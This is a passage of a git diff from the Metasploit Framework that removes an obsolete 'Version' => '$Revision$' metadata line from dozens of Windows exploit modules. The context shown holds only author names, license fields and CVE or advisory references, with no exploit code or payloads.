< Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5601' ], diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index fe58dfb7f3..e4ed63dc45 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote At this moment this module exploits the flaw on Windows XP IE6, IE7. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Sean de Regge', # Vulnerability discovery diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index 18946b8a4e..f2dd12d263 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0455' ], diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index 5eb1818ae8..3b3f11cc39 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1559' ], diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index b0bfec4d8e..8d4f81f4e5 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['Nicolas Gregoire'], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-1774'], diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 0df40e2d01..459c245cbe 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4475' ], diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index 65746019e0..c5b72f4817 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1682' ], diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index 339e21bf2b..7c7fb2dd35 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5603'], diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index ab55aa79ba..0b9454a827 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '36346' ], diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index ba111f6118..8ce25dd3f0 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3033' ], diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index a27a17e17a..5234ebaff7 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4388' ], diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index 2151eef80d..f916a8a1fb 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6016' ], diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index 5adc79b03d..39eef2d54b 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Nikolas Sotiriu (lofi)' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3031'], diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 87d11c7c66..fa818cd3df 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4385' ], diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index 470b883ae8..a4d4f7ac11 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # initial discovery/msf module 'sinn3r', #Auto target, obfuscation, lots of testing ], - 'Version' => '$Revision$', 'References' => [ #[ 'CVE', '?' ], diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index 815ea5b172..a291ec056a 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3189' ], diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index 84678cd33d..a84bb284ef 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0325' ], diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index 1230d7112b..b32e45309e 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'patrick', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1724' ], diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index ae98bbfc77..302a822239 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'shinnai', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3878' ], diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index b42325c7a3..643e5f6bca 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5492'], diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index bcd12f64a7..3b773aed04 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # Metasploit module 'mr_me ' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0356' ], diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index d21215e30f..64c53be79d 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote please note that IE 8 targets require Java support in order to run properly. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 3195cb1ece..c21a92f050 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jcran', # Exploit vectors ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html'], diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 0b6cdf8372..3674054caf 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -39,7 +39,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Guido Landi', # milw0rm exploit 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3558' ], diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index e543a4755c..1ddbca6f78 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', 'Faithless ' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-0476'], diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 52011a0872..0f6ffdda68 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0065' ], diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index 6ffe0c2220..5d3c984f3f 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0348' ], diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index ab339479b0..afb6b71111 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE','2006-5198' ], diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index b7ca072f91..203571bbbe 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'WooYun', 'MC', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '69942'], diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index a9695b3be8..c9652d1f25 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6063'], diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 8a6fc34f75..03079e7280 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4515' ], diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index d58c7d5bd3..3860acd820 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3147' ], diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index e129824fed..98a65fe6a3 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2987' ], diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 6b1bcb37f5..c926eb270c 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'spoonm', 'cazz' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0352' ], diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 13491dea41..82971236ac 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0059'], diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 886a0654de..5de7b057b2 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown' # 2 unknown contributors (2003 support) ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1748'], diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index f8ed6506f2..fe973a3415 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3039'], diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb index 776a60b1ac..740492065d 100644 --- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb +++ b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm' # porting the C version to ruby ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5882'], diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb index 1c5cd64809..d716b045fe 100644 --- a/modules/exploits/windows/driver/dlink_wifi_rates.rb +++ b/modules/exploits/windows/driver/dlink_wifi_rates.rb @@ -53,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Johnny Cache ' # making all of this possible ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-6055'], diff --git a/modules/exploits/windows/driver/netgear_wg111_beacon.rb b/modules/exploits/windows/driver/netgear_wg111_beacon.rb index 235e67bece..b533aa4eae 100644 --- a/modules/exploits/windows/driver/netgear_wg111_beacon.rb +++ b/modules/exploits/windows/driver/netgear_wg111_beacon.rb @@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5972'], diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 787530b552..8d9e0f68bf 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', # First version 'skape', # Vista support ], - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS07-017'], diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 3889b589a2..f6b0e920c7 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote command line options. }, 'Author' => 'Yorick Koster ', - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS10-045'], diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index 49323cefcc..820b965b72 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote command line options. }, 'Author' => 'Yorick Koster ', - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS10-045'], diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index bdad203c18..2f75b196a4 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2158' ], diff --git a/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb index c3696510a9..1870fcd47c 100644 --- a/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Dr_IDE', # SEH Exploit 'dookie' # MSF Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '67241' ], diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index 8e8ff8e80d..61f2d80f17 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Parvez Anwar', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2595' ], diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index f02488fa67..d3e2ed382f 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2193' ], diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index 0bdbdfbe1b..45e837d208 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64579'], diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 394a0d07f5..34b1c70653 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5659' ], diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 3878e46a95..a8ba842b7e 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote '@vicheck', # initial analysis 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2883' ], diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 747c855396..b05399bf87 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Haifei Li', # PoC 'jduck' # Metasploit version ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-3654'], diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index ce657a6137..888ca01a96 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown', # Found being openly exploited 'jduck' # Metasploit version ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-1297'], diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index 0754630ca4..6e9edb3247 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit version by: 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3459' ], diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index 822d33e1c3..ca79fcd9be 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Didier Stevens ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0927' ], diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index 042d9371be..7ac0ee598c 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Nine:Situations:Group::pyrokinesis', 'dookie' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4195' ], diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index dab5ffee86..596a71f3f5 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote # obfuscation techniques and pdf template from util_printf 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0658' ], diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index b7e14f5da4..d2f64182ca 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit version by: 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0188' ], diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 351e8ce511..3ce77c39ef 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'pusscat', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4324' ], diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 261073536e..0af3d0701a 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Colin Ames ', # initial module 'jduck' # add Documents for vista/win7 ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1240' ], diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index ac39baaf95..01deda83dd 100644 --- 